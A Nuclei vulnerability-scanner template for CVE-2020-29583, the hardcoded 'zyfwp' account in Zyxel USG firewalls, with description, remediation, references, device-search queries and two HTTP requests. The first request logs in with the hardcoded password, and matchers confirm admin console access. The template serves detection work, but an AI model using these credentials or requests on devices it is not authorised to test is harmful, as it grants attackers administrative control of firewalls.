id: CVE-2020-29583 info: name: ZyXel USG - Hardcoded Credentials author: canberbamber severity: critical description: | A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP. impact: | An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network. remediation: | Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue. reference: - https://www.zyxel.com/support/CVE-2020-29583.shtml - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583 - https://nvd.nist.gov/vuln/detail/CVE-2020-29583 - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 epss-score: 0.96125 epss-percentile: 0.995 cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: zyxel product: usg20-vpn_firmware shodan-query: - title:"USG FLEX 100" - http.title:"usg flex 100" fofa-query: title="usg flex 100" google-query: intitle:"usg flex 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev http: - raw: - | GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 Host: {{Hostname}} - | GET /ext-js/index.html HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - 'data-qtip="Web Console' - 'CLI' - 'Configuration">' condition: and - type: status status: - 200 # digest: 4a0a00473045022100a2ae062963e47e20957961aa77ace4d8bbafe9d75ab5f5ba8826088301781c3e022042377ff48be52c3086bef886dfb07d60d720f2969a1452672f62af68c456957d:922c64590222798bb761d5b6d8e72950